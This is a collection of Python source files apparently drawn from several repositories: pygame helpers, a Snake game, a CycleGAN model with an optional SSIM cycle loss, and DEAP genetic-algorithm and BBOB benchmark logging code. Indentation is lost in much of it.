#Return tickspeed of the clock
def getTickSpeed(self):
        return self.tickSpeed
#Set a new tickspeed for the clock
def setTickSpeed(self,newTickSpeed):
self.tickSpeed = newTickSpeed
#Return the clock object
def getClock(self):
return self.clock
#Tick the clock at the current tickspeed
def Tick(self):
self.clock.tick(self.tickSpeed)
#Return the surface
def getScreen(self):
return self.screen
#Return the width of the screen
def getWidth(self):
return self.screenx
#Return the height of the screen
def getHeight(self):
return self.screeny
#Render text function to blit text to surface
#Pass the text, the font size, the colour, x coordinate, y coordinate, surface to blit to
#Surface is App.getScreen()
def renderText(text,fontSize,colour,x,y,surface):
font = pygame.font.SysFont("monospace", fontSize)
text = surface.blit((font.render(text, 1, colour)),(x,y))
return text
#Save an image of the surface
#Pass the surface (App.getScreen())
def saveImage(surface):
root = Tk()
root.withdraw()
#Tkinter popup box asking if the user wishes to save an image of the screen
response = tkinter.messagebox.askyesno("Save Image","Would you like to save an image of the screen?")
root.update()
if response == True:
#Save an image of the screen
pygame.image.save(surface,"screenshot.png")
else:
return
#Return string of characters on keyboard from pygame.event
def getKey(key):
if key == pygame.K_a: return "a"
elif key == pygame.K_b: return "b"
elif key == pygame.K_c: return "c"
elif key == pygame.K_d: return "d"
elif key == pygame.K_e: return "e"
elif key == pygame.K_f: return "f"
elif key == pygame.K_g: return "g"
elif key == pygame.K_h: return "h"
elif key == pygame.K_i: return "i"
elif key == pygame.K_j: return "j"
elif key == pygame.K_k: return "k"
elif key == pygame.K_l: return "l"
elif key == pygame.K_m: return "m"
elif key == pygame.K_n: return "n"
elif key == pygame.K_o: return "o"
elif key == pygame.K_p: return "p"
elif key == pygame.K_q: return "q"
elif key == pygame.K_r: return "r"
elif key == pygame.K_s: return "s"
elif key == pygame.K_t: return "t"
elif key == pygame.K_u: return "u"
elif key == pygame.K_v: return "v"
elif key == pygame.K_w: return "w"
elif key == pygame.K_x: return "x"
elif key == pygame.K_y: return "y"
elif key == pygame.K_z: return "z"
elif key == pygame.K_0: return "0"
elif key == pygame.K_1: return "1"
elif key == pygame.K_2: return "2"
elif key == pygame.K_3: return "3"
elif key == pygame.K_4: return "4"
elif key == pygame.K_5: return "5"
elif key == pygame.K_6: return "6"
elif key == pygame.K_7: return "7"
elif key == pygame.K_8: return "8"
elif key == pygame.K_9: return "9"
elif key == pygame.K_BACKSPACE: return "backspace"
elif key == pygame.K_SPACE: return "space"
elif key == pygame.K_RETURN: return "return"
elif key == pygame.K_ESCAPE: return "escape"
elif key == pygame.K_UP: return "up"
elif key == pygame.K_DOWN: return "down"
elif key == pygame.K_RIGHT: return "right"
elif key == pygame.K_LEFT: return "left"
``` |
{
"source": "jj-style/Snake",
"score": 4
} |
#### File: jj-style/Snake/snake.py
```python
import pygame
import random
import time
BLACK = (0,0,0)
WHITE = (255,255,255)
RED = (255,0,0)
GREEN = (0,255,0)
snake_block_size = 15
screen_dimensions = 400
while screen_dimensions % snake_block_size != 0:
screen_dimensions += 1
screenx = screen_dimensions
screeny = screen_dimensions
#__________CLASSES__________#
class Game():
def __init__(self):
self.lastKey = "right"
self.food = None
self.score = 0
def setLastKey(self,key):
self.lastKey = key
def getLastKey(self):
return self.lastKey
def spawnFood(self):
validx = False
while not validx:
x = random.randint(0,(screenx-snake_block_size)%screenx)
if x % snake_block_size == 0:
validx = True
validy = False
while not validy:
y = random.randint(0,(screeny-snake_block_size)%screeny)
if y % snake_block_size == 0:
validy = True
self.food = [x,y]
def showFood(self):
return pygame.draw.rect(app.getScreen(),GREEN,(self.food[0],self.food[1],snake_block_size,snake_block_size))
def getFood(self):
return self.food
def increaseScore(self):
self.score += 1
if self.score % 5 == 0:
app.setTickSpeed(app.getTickSpeed()+2)
def showScore(self):
renderText(str(self.score),25,BLACK,25,25)
def getScore(self):
return self.score
class Player():
def __init__(self,starting_length = 5):
self.length = starting_length
self.x = [snake_block_size for i in range(self.length)]
self.y = [snake_block_size for i in range(self.length)]
def show(self):
for i in range(self.length):
pygame.draw.rect(app.getScreen(),RED,(self.x[i],self.y[i],snake_block_size,snake_block_size))
def update(self,direction):
i = self.length -1
while i >= 1:
self.x[i] = self.x[i-1]
self.y[i] = self.y[i-1]
i -= 1
if direction == "right":
self.x[0] = (self.x[0]+(snake_block_size)) % screenx
elif direction == "left":
self.x[0] = (self.x[0]-(snake_block_size)) % screenx
elif direction == "up":
self.y[0] = (self.y[0]-(snake_block_size)) % screeny
elif direction == "down":
self.y[0] = (self.y[0]+(snake_block_size)) % screeny
def getX(self):
return self.x
def getY(self):
return self.y
def getLength(self):
return self.length
def eat(self):
game.increaseScore()
self.length += 1
self.x.append(screenx-1)
self.y.append(screeny-1)
class App():
def __init__(self):
pygame.init()
pygame.mixer.quit()
pygame.display.set_caption('snake')
self.screen = pygame.display.set_mode((screenx, screeny))
self.clock = pygame.time.Clock()
self.tickspeed = 20
def exitGame(self):
pygame.quit()
quit()
def getTickSpeed(self):
return self.tickspeed
def setTickSpeed(self,new_tickspeed):
self.tickspeed = new_tickspeed
def getClock(self):
return self.clock
def getScreen(self):
return self.screen
#__________EVENTS RENDER__________#
def events():
direction = ""
for event in pygame.event.get():
if event.type == pygame.QUIT:
app.exitGame()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT and game.getLastKey() != "right":
direction = "left"
elif event.key == pygame.K_RIGHT and game.getLastKey() != "left":
direction = "right"
elif event.key == pygame.K_UP and game.getLastKey() != "down":
direction = "up"
elif event.key == pygame.K_DOWN and game.getLastKey() != "up":
direction = "down"
if direction != "":
game.setLastKey(direction)
def render():
app.getScreen().fill(WHITE)
player.show()
game.showFood()
game.showScore()
pygame.display.update()
app.getClock().tick(app.getTickSpeed())
def renderText(text,fontSize,colour,x,y):
font = pygame.font.SysFont("monospace", fontSize)
text = app.getScreen().blit((font.render(text, 1, colour)),(x,y))
return text
#__________GAME FUNCTIONS__________#
def eatSnake():
headx = player.getX()[0]
heady = player.getY()[0]
for i in range(1,player.getLength()):
if player.getX()[i] == headx and player.getY()[i] == heady:
return True
return False
def eatFood():
if game.showFood().collidepoint(player.getX()[0],player.getY()[0]):
game.spawnFood()
player.eat()
#__________GAME OVER__________#
def gameOverRender():
app.getScreen().fill(WHITE)
player.show()
game.showFood()
renderText("GAME OVER",30,BLACK,screenx/3,screeny/10)
renderText("Score: {}".format(str(game.getScore())),20,BLACK,screenx/3,screeny/6)
renderText("Press enter to restart",20,BLACK,0.175*screenx,0.75*screeny)
pygame.display.update()
app.getClock().tick(app.getTickSpeed())
def gameOverGetMove(last_choice):
new_choice = last_choice
while new_choice == last_choice:
new_choice = random.choice(["up","down","left","right"])
if last_choice == "up" and new_choice == "down":
new_choice = "up"
elif last_choice == "down" and new_choice == "up":
new_choice = "down"
elif last_choice == "left" and new_choice == "right":
new_choice = "left"
elif last_choice == "right" and new_choice == "left":
new_choice = "right"
return new_choice
def gameOverEvents():
for event in pygame.event.get():
if event.type == pygame.QUIT:
app.exitGame()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_RETURN:
return True
elif event.key == pygame.K_BACKSPACE:
return False
return None
def gameOverScreen():
move = 0
computerChoice = game.getLastKey()
while True:
gameOverRender()
play_again = gameOverEvents()
move += 1
if move % 15 == 0:
computerChoice = gameOverGetMove(computerChoice)
player.update(computerChoice)
eatFood()
if play_again == True:
return True
elif play_again == False:
app.exitGame()
#__________MAIN__________#
def main():
game.spawnFood()
gameOver = False
while not gameOver:
events()
render()
player.update(game.getLastKey())
eatFood()
gameOver = eatSnake()
gameOverScreen()
if __name__ == "__main__":
while True:
app = App()
player = Player() #starting_length=10
game = Game()
main()
``` |
{
"source": "jjSveding/pytorch-CycleGAN-and-pix2pix",
"score": 3
} |
#### File: pytorch-CycleGAN-and-pix2pix/models/cycle_gan_model.py
```python
import torch
import itertools
from util.pytorch_ssim import SSIM
from util.image_pool import ImagePool
from .base_model import BaseModel
from . import networks
class CycleGANModel(BaseModel):
"""
This class implements the CycleGAN model, for learning image-to-image translation without paired data.
The model training requires '--dataset_mode unaligned' dataset.
By default, it uses a '--netG resnet_9blocks' ResNet generator,
a '--netD basic' discriminator (PatchGAN introduced by pix2pix),
and a least-square GANs objective ('--gan_mode lsgan').
CycleGAN paper: https://arxiv.org/pdf/1703.10593.pdf
"""
@staticmethod
def modify_commandline_options(parser, is_train=True):
"""Add new dataset-specific options, and rewrite default values for existing options.
Parameters:
parser -- original option parser
is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options.
Returns:
the modified parser.
For CycleGAN, in addition to GAN losses, we introduce lambda_A, lambda_B, and lambda_identity for the following losses.
A (source domain), B (target domain).
Generators: G_A: A -> B; G_B: B -> A.
Discriminators: D_A: G_A(A) vs. B; D_B: G_B(B) vs. A.
Forward cycle loss: lambda_A * ||G_B(G_A(A)) - A|| (Eqn. (2) in the paper)
Backward cycle loss: lambda_B * ||G_A(G_B(B)) - B|| (Eqn. (2) in the paper)
Identity loss (optional): lambda_identity * (||G_A(B) - B|| * lambda_B + ||G_B(A) - A|| * lambda_A) (Sec 5.2 "Photo generation from paintings" in the paper)
Dropout is not used in the original CycleGAN paper.
"""
parser.set_defaults(no_dropout=True) # default CycleGAN did not use dropout
if is_train:
parser.add_argument('--lambda_A', type=float, default=10.0, help='weight for cycle loss (A -> B -> A)')
parser.add_argument('--lambda_B', type=float, default=10.0, help='weight for cycle loss (B -> A -> B)')
parser.add_argument('--lambda_identity', type=float, default=0.5, help='use identity mapping. Setting lambda_identity other than 0 has an effect of scaling the weight of the identity mapping loss. For example, if the weight of the identity loss should be 10 times smaller than the weight of the reconstruction loss, please set lambda_identity = 0.1')
parser.add_argument('--cycle_loss_func', type=str, default='l1', help='Cycle consistency loss function [l1 | ssim]')
return parser
def __init__(self, opt):
"""Initialize the CycleGAN class.
Parameters:
opt (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions
"""
BaseModel.__init__(self, opt)
# specify the training losses you want to print out. The training/test scripts will call <BaseModel.get_current_losses>
self.loss_names = ['D_A', 'G_A', 'cycle_A', 'idt_A', 'D_B', 'G_B', 'cycle_B', 'idt_B']
# specify the images you want to save/display. The training/test scripts will call <BaseModel.get_current_visuals>
visual_names_A = ['real_A', 'fake_B', 'rec_A']
visual_names_B = ['real_B', 'fake_A', 'rec_B']
        if self.isTrain and self.opt.lambda_identity > 0.0:  # if identity loss is used, we also visualize idt_A=G_A(B) and idt_B=G_B(A)
visual_names_A.append('idt_B')
visual_names_B.append('idt_A')
self.visual_names = visual_names_A + visual_names_B # combine visualizations for A and B
# specify the models you want to save to the disk. The training/test scripts will call <BaseModel.save_networks> and <BaseModel.load_networks>.
if self.isTrain:
self.model_names = ['G_A', 'G_B', 'D_A', 'D_B']
else: # during test time, only load Gs
self.model_names = ['G_A', 'G_B']
# define networks (both Generators and discriminators)
# The naming is different from those used in the paper.
# Code (vs. paper): G_A (G), G_B (F), D_A (D_Y), D_B (D_X)
self.netG_A = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG, opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)
self.netG_B = networks.define_G(opt.output_nc, opt.input_nc, opt.ngf, opt.netG, opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)
if self.isTrain: # define discriminators
self.netD_A = networks.define_D(opt.output_nc, opt.ndf, opt.netD,
opt.n_layers_D, opt.norm, opt.init_type, opt.init_gain, self.gpu_ids)
self.netD_B = networks.define_D(opt.input_nc, opt.ndf, opt.netD,
opt.n_layers_D, opt.norm, opt.init_type, opt.init_gain, self.gpu_ids)
if self.isTrain:
if opt.lambda_identity > 0.0: # only works when input and output images have the same number of channels
assert(opt.input_nc == opt.output_nc)
self.fake_A_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images
self.fake_B_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images
# define loss functions
self.criterionGAN = networks.GANLoss(opt.gan_mode).to(self.device) # define GAN loss.
            if self.opt.cycle_loss_func == "l1":
self.criterionCycle = torch.nn.L1Loss()
self.criterionIdt = torch.nn.L1Loss()
else:
self.criterionCycle = SSIM()
self.criterionIdt = SSIM()
# initialize optimizers; schedulers will be automatically created by function <BaseModel.setup>.
self.optimizer_G = torch.optim.Adam(itertools.chain(self.netG_A.parameters(), self.netG_B.parameters()), lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizer_D = torch.optim.Adam(itertools.chain(self.netD_A.parameters(), self.netD_B.parameters()), lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizers.append(self.optimizer_G)
self.optimizers.append(self.optimizer_D)
def set_input(self, input):
"""Unpack input data from the dataloader and perform necessary pre-processing steps.
Parameters:
input (dict): include the data itself and its metadata information.
The option 'direction' can be used to swap domain A and domain B.
"""
AtoB = self.opt.direction == 'AtoB'
self.real_A = input['A' if AtoB else 'B'].to(self.device)
self.real_B = input['B' if AtoB else 'A'].to(self.device)
self.image_paths = input['A_paths' if AtoB else 'B_paths']
def forward(self):
"""Run forward pass; called by both functions <optimize_parameters> and <test>."""
self.fake_B = self.netG_A(self.real_A) # G_A(A)
self.rec_A = self.netG_B(self.fake_B) # G_B(G_A(A))
self.fake_A = self.netG_B(self.real_B) # G_B(B)
self.rec_B = self.netG_A(self.fake_A) # G_A(G_B(B))
def backward_D_basic(self, netD, real, fake):
"""Calculate GAN loss for the discriminator
Parameters:
netD (network) -- the discriminator D
real (tensor array) -- real images
fake (tensor array) -- images generated by a generator
Return the discriminator loss.
We also call loss_D.backward() to calculate the gradients.
"""
# Real
pred_real = netD(real)
loss_D_real = self.criterionGAN(pred_real, True)
# Fake
pred_fake = netD(fake.detach())
loss_D_fake = self.criterionGAN(pred_fake, False)
# Combined loss and calculate gradients
loss_D = (loss_D_real + loss_D_fake) * 0.5
loss_D.backward()
return loss_D
def backward_D_A(self):
"""Calculate GAN loss for discriminator D_A"""
fake_B = self.fake_B_pool.query(self.fake_B)
self.loss_D_A = self.backward_D_basic(self.netD_A, self.real_B, fake_B)
def backward_D_B(self):
"""Calculate GAN loss for discriminator D_B"""
fake_A = self.fake_A_pool.query(self.fake_A)
self.loss_D_B = self.backward_D_basic(self.netD_B, self.real_A, fake_A)
def backward_G(self):
"""Calculate the loss for generators G_A and G_B"""
lambda_idt = self.opt.lambda_identity
lambda_A = self.opt.lambda_A
lambda_B = self.opt.lambda_B
# Identity loss
if lambda_idt > 0:
# G_A should be identity if real_B is fed: ||G_A(B) - B||
self.idt_A = self.netG_A(self.real_B)
self.loss_idt_A = self.criterionIdt(self.idt_A, self.real_B) * lambda_B * lambda_idt
# G_B should be identity if real_A is fed: ||G_B(A) - A||
self.idt_B = self.netG_B(self.real_A)
self.loss_idt_B = self.criterionIdt(self.idt_B, self.real_A) * lambda_A * lambda_idt
else:
self.loss_idt_A = 0
self.loss_idt_B = 0
# GAN loss D_A(G_A(A))
self.loss_G_A = self.criterionGAN(self.netD_A(self.fake_B), True)
# GAN loss D_B(G_B(B))
self.loss_G_B = self.criterionGAN(self.netD_B(self.fake_A), True)
# Forward cycle loss || G_B(G_A(A)) - A||
self.loss_cycle_A = self.criterionCycle(self.rec_A, self.real_A) * lambda_A
# Backward cycle loss || G_A(G_B(B)) - B||
self.loss_cycle_B = self.criterionCycle(self.rec_B, self.real_B) * lambda_B
# combined loss and calculate gradients
self.loss_G = self.loss_G_A + self.loss_G_B + self.loss_cycle_A + self.loss_cycle_B + self.loss_idt_A + self.loss_idt_B
self.loss_G.backward()
def optimize_parameters(self):
"""Calculate losses, gradients, and update network weights; called in every training iteration"""
# forward
self.forward() # compute fake images and reconstruction images.
# G_A and G_B
self.set_requires_grad([self.netD_A, self.netD_B], False) # Ds require no gradients when optimizing Gs
self.optimizer_G.zero_grad() # set G_A and G_B's gradients to zero
self.backward_G() # calculate gradients for G_A and G_B
self.optimizer_G.step() # update G_A and G_B's weights
# D_A and D_B
self.set_requires_grad([self.netD_A, self.netD_B], True)
self.optimizer_D.zero_grad() # set D_A and D_B's gradients to zero
self.backward_D_A() # calculate gradients for D_A
        self.backward_D_B()      # calculate gradients for D_B
self.optimizer_D.step() # update D_A and D_B's weights
``` |
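The only functional change relative to the upstream CycleGAN model is the `--cycle_loss_func` flag, which swaps the L1 cycle/identity criteria for SSIM. Below is a minimal, self-contained sketch of what such an SSIM criterion could look like; the `SSIM` class actually imported by the model is not shown in this file, so the windowing details (here a uniform window) and the input range (here assumed [0, 1], whereas CycleGAN tensors are typically in [-1, 1]) are assumptions.
```python
import torch
import torch.nn.functional as F


class SSIMLoss(torch.nn.Module):
    """Returns 1 - mean SSIM, so that minimizing it maximizes similarity."""

    def __init__(self, window_size=11, c1=0.01 ** 2, c2=0.03 ** 2):
        super().__init__()
        self.window_size = window_size
        self.c1 = c1  # stabilizing constants from the SSIM paper, tuned for [0, 1] inputs
        self.c2 = c2

    def forward(self, x, y):
        pad = self.window_size // 2
        # local means, variances, and covariance via a uniform averaging window
        mu_x = F.avg_pool2d(x, self.window_size, stride=1, padding=pad)
        mu_y = F.avg_pool2d(y, self.window_size, stride=1, padding=pad)
        var_x = F.avg_pool2d(x * x, self.window_size, stride=1, padding=pad) - mu_x ** 2
        var_y = F.avg_pool2d(y * y, self.window_size, stride=1, padding=pad) - mu_y ** 2
        cov_xy = F.avg_pool2d(x * y, self.window_size, stride=1, padding=pad) - mu_x * mu_y
        ssim = ((2 * mu_x * mu_y + self.c1) * (2 * cov_xy + self.c2)) / (
            (mu_x ** 2 + mu_y ** 2 + self.c1) * (var_x + var_y + self.c2))
        return 1.0 - ssim.mean()
```
Selecting the branch is then a matter of passing `--cycle_loss_func ssim` on the training command line; any value other than `l1` falls through to the SSIM branch in `__init__` above.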
{
"source": "JJ/swarm-ga-worker",
"score": 2
} |
#### File: JJ/swarm-ga-worker/coco.py
```python
import numpy as np
import worker.bbobbenchmarks as bn
import random
class CoCoData(object):
    def __init__(self, dim, function, instance, nbptsevals=20, nbptsf=5):
self.evalsTrigger = 1
self.function = function
self.instance = instance
self.lasteval_num = 0
self.fTrigger = np.inf
self.idxFTrigger = np.inf
self.nbptsf = nbptsf
self.idxEvalsTrigger = 0
self.nbptsevals = nbptsevals
self.dim = dim
self.idxDIMEvalsTrigger = 0.
self.nbFirstEvalsToAlwaysWrite = 1
    def evalfun(self, algorithm, gen, ngen, fmin, fopt, error, sol, buffr=None, hbuffr=None):
fmin = float(fmin)
fopt = float(fopt)
error = float(error)
self.lasteval_num = self.lasteval_num + int(ngen)
if (self.lasteval_num >= self.evalsTrigger or fmin - fopt < self.fTrigger):
            # Write a .dat-style line when we have passed the evaluation-count trigger
if self.lasteval_num >= self.evalsTrigger:
#In order to pass an assertion in DataSet() we add a fake first eval using a random solution
if not buffr:
#buffr.append(self.sprintData(1, algorithm, gen, ngen, fmin, fopt, error, sol))
random_sol = [10. * random.random() - 5 for _ in range(self.dim)]
function = bn.dictbbob[self.function](self.instance)
fval = function(random_sol)
fopt = function.getfopt()
buffr.append(self.sprintData(1, algorithm, gen, ngen, fval, fopt, fopt - fval, random_sol))
buffr.append(self.sprintData(self.lasteval_num, algorithm, gen, ngen, fmin, fopt, error, sol))
while self.lasteval_num >= np.floor(10 ** (self.idxEvalsTrigger / self.nbptsevals)):
self.idxEvalsTrigger += 1
while self.lasteval_num >= self.dim * 10 ** self.idxDIMEvalsTrigger:
self.idxDIMEvalsTrigger += 1
self.evalsTrigger = min(np.floor(10 ** (self.idxEvalsTrigger / self.nbptsevals)),
self.dim * 10 ** self.idxDIMEvalsTrigger)
if self.lasteval_num < self.nbFirstEvalsToAlwaysWrite:
self.evalsTrigger = self.lasteval_num + 1
# Also if we have a better solution
if fmin - fopt < self.fTrigger: # minimization only
if not hbuffr:
random_sol = [10. * random.random() - 5 for _ in range(self.dim)]
function = bn.dictbbob[self.function](self.instance)
fval = function(random_sol)
fopt = function.getfopt()
hbuffr.append(self.sprintData(1, algorithm, gen, ngen, fval, fopt, fopt - fval, random_sol))
#hbuffr.append(self.sprintData(1, algorithm, gen, ngen, fmin, fopt, error, sol))
hbuffr.append(self.sprintData(self.lasteval_num, algorithm, gen, ngen, fmin, fopt, error, sol))
if fmin <= fopt:
self.fTrigger = -np.inf
else:
if np.isinf(self.idxFTrigger):
self.idxFTrigger = np.ceil(np.log10(fmin - fopt)) * self.nbptsf
while fmin - fopt <= 10 ** (self.idxFTrigger / self.nbptsf):
self.idxFTrigger -= 1
self.fTrigger = min(self.fTrigger, 10 ** (self.idxFTrigger / self.nbptsf)) # TODO: why?
def sprintData(self, lasteval_num, algorithm, gen, ngen, fmin, fopt, error, sol):
"""Format data for printing."""
res = ('%d %+10.9e %+10.9e %+10.9e %+10.9e'
% (lasteval_num, fmin - fopt,
fmin - fopt, fmin,
fopt))
if len(sol) < 22:
tmp = []
for i in sol:
tmp.append(' %+5.4e' % i)
res += ''.join(tmp)
res += '\n'
return res
```
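`CoCoData` mimics the logging triggers of the COCO/BBOB experiment framework: a line is buffered whenever the evaluation count crosses a (roughly log-spaced) evaluation trigger, or whenever the best error drops below the current target trigger. A minimal usage sketch follows; the import path and the integer function id are assumptions based on how `ga_worker.py` below uses `dictbbob`.
```python
import worker.bbobbenchmarks as bn
from coco import CoCoData  # assuming coco.py sits at the repository root

dim, function_id, instance = 10, 1, 1          # BBOB F1 (sphere), instance 1
logger = CoCoData(dim, function_id, instance)

func = bn.dictbbob[function_id](instance)
fopt = func.getfopt()

buffr, hbuffr = [], []                         # eval-triggered and target-triggered lines
sol = [0.0] * dim                              # hypothetical best solution so far
fmin = func(sol)

# ngen is the number of new evaluations performed since the previous call
logger.evalfun("GA", gen=0, ngen=100, fmin=fmin, fopt=fopt,
               error=fmin - fopt, sol=sol, buffr=buffr, hbuffr=hbuffr)
print("".join(buffr), end="")
```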
#### File: swarm-ga-worker/worker/ga_worker.py
```python
import random
from bbobbenchmarks import *
import uuid
from deap import base
from deap import creator
from deap import tools
class GA_Worker:
def __init__(self, conf):
self.conf = conf
self.function = dictbbob[self.conf['problem']['function']](int(self.conf['problem']['instance']))
self.F_opt = self.function.getfopt()
        self.function_evaluations = 0  # not needed in EvoWorkers; they don't know the total number of FEs
self.deltaftarget = 1e-8
self.toolbox = base.Toolbox()
self.FC = 0
self.worker_uuid = uuid.uuid1()
self.space = None
        self.evospace_sample = {'sample': conf['population']}
def setup(self):
if "FitnessMin" not in dir(creator):
creator.create("FitnessMin", base.Fitness, weights=(-1.0,)) #Minimizing Negative
if "Individual" not in dir(creator):
creator.create("Individual", list, typecode='d', fitness=creator.FitnessMin)
self.toolbox = base.Toolbox()
self.toolbox.register("attr_float", random.uniform, -5, 5)
self.toolbox.register("individual", tools.initRepeat, creator.Individual, self.toolbox.attr_float, self.conf['problem']['dim'])
self.toolbox.register("population", tools.initRepeat, list, self.toolbox.individual)
self.toolbox.register("evaluate", self.eval)
self.toolbox.register("mate", tools.cxTwoPoint)
self.toolbox.register("mutate", tools.mutGaussian, mu=self.conf['params']['GA']['mutation']['mu'], sigma=self.conf['params']['GA']['mutation']['sigma'], indpb=self.conf['params']['GA']['mutation']['indpb'])
self.toolbox.register("select", tools.selTournament, tournsize=self.conf['params']['GA']['selection']['tournsize'])
def eval(self, individual):
return self.function(individual),
def get(self):
pop = []
for cs in self.evospace_sample['sample']:
ind = creator.Individual(cs['chromosome'])
if 'score' in cs['fitness']:
ind.fitness = creator.FitnessMin(values=(cs['fitness']['score'],))
pop.append(ind)
return pop
def run(self):
evals = []
num_fe_first_sample = 0
first_sample = True
#random.seed(i)
CXPB = self.conf['params']['GA']['crossover']['CXPB']
MUTPB = self.conf['params']['GA']['mutation']['MUTPB']
NGEN = self.conf['params']['GA']['iterations']
pop = self.get()
        # Evaluate only the individuals without a valid fitness (the seed
        # sample may already carry scores from other workers)
        invalid_ind = [ind for ind in pop if not ind.fitness.valid]
        num_fe_first_sample += len(invalid_ind)
        fitnesses = list(map(self.toolbox.evaluate, invalid_ind))
        for ind, fit in zip(invalid_ind, fitnesses):
            ind.fitness.values = fit
# Begin the evolution
for g in range(NGEN):
num_fe = 0
#print("-- Generation %i --" % g)
# Select the next generation individuals
offspring = self.toolbox.select(pop, len(pop))
# Clone the selected individuals
offspring = list(map(self.toolbox.clone, offspring))
# Apply crossover and mutation on the offspring
for child1, child2 in zip(offspring[::2], offspring[1::2]):
# cross two individuals with probability CXPB
if random.random() < CXPB:
self.toolbox.mate(child1, child2)
# fitness values of the children
# must be recalculated later
del child1.fitness.values
del child2.fitness.values
for mutant in offspring:
# mutate an individual with probability MUTPB
if random.random() < MUTPB:
self.toolbox.mutate(mutant)
del mutant.fitness.values
# Evaluate the individuals with an invalid fitness
invalid_ind = [ind for ind in offspring if not ind.fitness.valid]
fitnesses = map(self.toolbox.evaluate, invalid_ind)
for ind, fit in zip(invalid_ind, fitnesses):
ind.fitness.values = fit
#print(" Evaluated %i individuals" % len(invalid_ind))
num_fe = num_fe + len(invalid_ind)
# The population is entirely replaced by the offspring
pop[:] = offspring
#print(pop)
# Gather all the fitnesses in one list and print the stats
fits = [ind.fitness.values[0] for ind in pop]
evals.append({"gen_num":g,"best_fitness":min(fits),"best_solution":tools.selBest(pop, 1)[0], "num_of_evals":num_fe })
best_ind = tools.selBest(pop, 1)[0]
final_pop = [{"chromosome": ind[:], "id": None,
"fitness": {"DefaultContext": ind.fitness.values[0], "score": ind.fitness.values[0]}}
for ind in pop]
self.conf.update({'iterations': evals, 'population': final_pop, 'best_individual': best_ind ,
'fopt': self.function.getfopt(), 'best_score':best_ind.fitness.values[0]})
        # 'best' flags whether the worker reached the BBOB target precision
        self.conf['best'] = bool(best_ind.fitness.values[0] <= self.F_opt + self.deltaftarget)
#print("Worker", self.conf)
return self.conf
``` |
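A sketch of driving `GA_Worker` end to end. The `conf` dictionary below is hypothetical, reverse-engineered from the attribute accesses in `setup()`, `get()`, and `run()`; in the actual swarm setup it presumably arrives from the queueing infrastructure, and the sketch assumes the import paths resolve (note that `ga_worker.py` imports `bbobbenchmarks` as a sibling module).
```python
import random
from worker.ga_worker import GA_Worker

dim = 10
conf = {
    "problem": {"function": 1, "instance": 1, "dim": dim},  # BBOB F1 (sphere)
    "params": {"GA": {
        "crossover": {"CXPB": 0.5},
        "mutation": {"MUTPB": 0.2, "mu": 0.0, "sigma": 0.5, "indpb": 0.1},
        "selection": {"tournsize": 3},
        "iterations": 50,
    }},
    # seed population in the interchange format consumed by get()
    "population": [{"chromosome": [random.uniform(-5, 5) for _ in range(dim)],
                    "id": None, "fitness": {}}
                   for _ in range(40)],
}

worker = GA_Worker(conf)
worker.setup()
result = worker.run()
print(result["best_score"], "reached target:", result["best"])
```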